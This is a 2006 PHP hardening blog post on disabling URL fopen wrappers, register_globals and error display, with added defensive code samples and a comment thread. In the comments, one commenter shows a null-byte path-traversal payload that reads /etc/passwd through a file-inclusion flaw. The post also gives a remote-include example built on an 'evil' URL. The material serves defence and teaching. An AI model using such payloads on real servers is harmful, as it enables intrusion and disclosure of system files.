2 Easy Steps to Increase Security in PHP
I get a lot of questions about how to increase the security of a PHP app.
Aside from the obvious (write secure code), there are two easy "switches that you can flick".
Disable: URL fopen wrappers
This will prevent most exploitations of the classic File Inclusion Vulnerability.
e.g. include($foo.'bar.php');
Now if $foo is set to 'http://www.stevenroddis.com/evil?'
the script grabs PHP code from "http://www.stevenroddis.com/evil?bar.php".
But if URL fopen wrappers are off, then the hacker can only use files on your server (still with limitations, such as the appended string).
However, there is a downside to this: some applications may use URL wrappers to download data off the web. You can work around it by using curl, but you might not want to.
How?
php.ini (most people won't have access to this)
allow_url_fopen = Off
.htaccess
php_flag allow_url_fopen off
Turn Off: Register Globals
Yes, it is off by default but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.
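To make the risk concrete, here is an added example (not from the original post) of the classic pattern that register_globals turns into an authentication bypass, beside the habit that keeps the code correct whether the setting is on or off. The authenticated_user() helper and the protected file path are assumptions.

```php
<?php
// Added example, not from the original post.

// --- Vulnerable with register_globals = On: $authorized is only assigned on a
// successful login and never initialised otherwise. A request such as
// ?authorized=1 creates the global $authorized before this code runs, so the
// check passes without a password.
function protected_resource_unsafe()
{
    global $authorized;
    if (authenticated_user()) {               // assumed helper that validates a login
        $authorized = true;
    }
    if ($authorized) {
        return '/highly/sensitive/data.php';  // assumed protected path
    }
    return null;
}

// --- Hardened: initialise every variable before use and take request data only
// from the superglobal you mean (here the session), never from the global scope.
// This is correct regardless of register_globals.
function protected_resource_safe(array $session)
{
    $authorized = false;                      // explicit default
    if (isset($session['authorized']) && $session['authorized'] === true) {
        $authorized = true;
    }
    return $authorized ? '/highly/sensitive/data.php' : null;
}

// Usage: session_start(); $file = protected_resource_safe($_SESSION);
// if ($file === null) { header('HTTP/1.0 403 Forbidden'); die('Forbidden'); }
```

The safe version has no variable whose initial value depends on the environment, which is why it does not care what php.ini says.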
How?
php.ini (most people won't have access to this)
register_globals = Off
.htaccess
php_flag register_globals off
#3 Bonus: Turn off Error Reporting
A lot of sites display sensitive information in their error messages, which can make it easier to find a security hole and/or exploit it.
How?
php.ini (most people won't have access to this)
display_errors = Off
.htaccess
php_flag display_errors Off
Enforce these in your web app:
Don't let careless configuration changes bring down your defences. Inside your PHP application, make sure you die() and give some [nice] error when, say, register globals is turned back on.
Code:
// Refuse to run if register_globals has been switched back on
if (@ini_get('register_globals'))
{
    die();
}
You might want to do it also for allow_url_fopen (replace “register_globals” in the above with “allow_url_fopen”).
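Here is an added example (not from the original post) that extends the check above to all three settings in one guard file, to be required first in every entry point. It reads ini_get() defensively: php.ini stores On/Off as "1"/"", php_flag as "1"/"0", and ini_set() may store "On"/"Off" literally, so the raw value is normalised with filter_var() (available since PHP 5.2.0). The allow_url_include directive is a real PHP 5.2+ setting added to the list; the 503 response and log message are assumptions.

```php
<?php
// Added example, not from the original post. Require this file first.

// Directives that must be off for the app to run.
function directives_that_must_be_off()
{
    return array('register_globals', 'allow_url_fopen', 'allow_url_include', 'display_errors');
}

// Returns the list of directives that are not off, as "name=value" strings.
function insecure_directives(array $must_be_off)
{
    $bad = array();
    foreach ($must_be_off as $directive) {
        $raw = @ini_get($directive);
        if ($raw === false) {
            // Directive unknown to this PHP build (register_globals was removed
            // in PHP 5.4): nothing to enforce.
            continue;
        }
        $off = filter_var($raw, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
        if ($off !== false) {
            // "1", "On", or something unexpected such as "stderr": treat as on.
            $bad[] = $directive . '=' . var_export($raw, true);
        }
    }
    return $bad;
}

$problems = insecure_directives(directives_that_must_be_off());
if (count($problems) > 0) {
    // Detail goes to the server log for the operator; the visitor learns nothing useful.
    error_log('Refusing to run, insecure PHP settings: ' . implode(', ', $problems));
    header('HTTP/1.0 503 Service Unavailable');
    die('This site is temporarily unavailable.');
}
```

Keeping the specifics in error_log() rather than in the page body follows the same rule as turning display_errors off: the operator gets the diagnosis, the visitor does not.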
There you have it: two (well, four) easy and simple steps to greatly increase security in your PHP application. (Three of them don't require changing your code.)
Regards,
Steven Roddis
r0ut3r said,
October 17, 2006 @ 9:51 am
“But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)” - Not if you stop it midway through the include…
Steven Roddis said,
October 17, 2006 @ 4:35 pm
And how are you going to do that?
$foo = 'bar';
include('/file.txt'.$foo);
??
r0ut3r said,
November 5, 2006 @ 10:48 am
I was under the impression you were referring to this:
e.g. include($foo.'bar.php');
————————–
Now if $foo is set to 'http://www.stevenroddis.com/evil?'
The script grabs PHP code from "http://www.stevenroddis.com/evil?bar.php"
————————–
meaning you would need to have a file named “evil?bar.php”, but this is not the case, just inject a null value to make it stop half way through the include statement.
And when you say "(Still with limitations such as the appending string)" - no need to worry about the appending string if you use the method I described above ;)
That should help, if not, just send me an email. writ3r [ at ] gmail.com
Steven Roddis said,
November 5, 2006 @ 11:00 am
“meaning you would need to have a file named “evil?bar.php”, but this is not the case, just inject a null value to make it stop half way through the include statement.”
The ? in a URL starts the query string.
Ie. http://www.stevenroddis.com/evil.txt?87as
== http://www.stevenroddis.com/evil.txt
r0ut3r said,
November 14, 2006 @ 9:17 pm
“The ? in url starts the query string.
Ie. http://www.stevenroddis.com/evil.txt?87as
== http://www.stevenroddis.com/evil.txt ”
Yes, but that's not what I am talking about.
Say you have a local file include vuln, like these ones:
http://milw0rm.com/exploits/2768
You see the vulnerable code there? And you see it adds .language.php on the end of the file?
.$setLang.'.language.php');
So if you just did a request like:
?lang=../../../etc/passwd
it will try and read the file:
/etc/passwd.language.php
Now that's going to create a problem and render this exploit practically useless.
Now to the point, with a little background. In many programming languages you can use null characters to do stuff, depending on what you need it to do; in C you use , and in PHP we use %00. Now what a null byte actually does, and is commonly used for, is stopping a string or function midway. Note: I've only used a null byte in C once, and it was for an authentication script where I was trying to prevent some form of vulnerability, can't remember, a while ago. I've never used it in PHP except to assist in exploitation. So back to the example; to stop the script from adding .language.php onto the end, it must be stopped half way. Therefore…
We will inject a null byte to stop it half way, preventing .language.php from being added. It is done like so:
?lang=../../../etc/passwd%00
Does this make sense now?
r0ut3r (writ3r [ at ] gmail.com)
r0ut3r said,
November 15, 2006 @ 11:41 pm
You're gonna find this interesting, heh:
—————————————
#################################################################################################
# r0ut3r Presents… #
# #
# Another r0ut3r discovery! #
# #
# TorrentFlux 2.2 Arbitrary File Creation/Overwrite/Deletion & Command Execution Vulnerabilities #
# #
#################################################################################################
It’ll be on my site. :)
r0ut3r.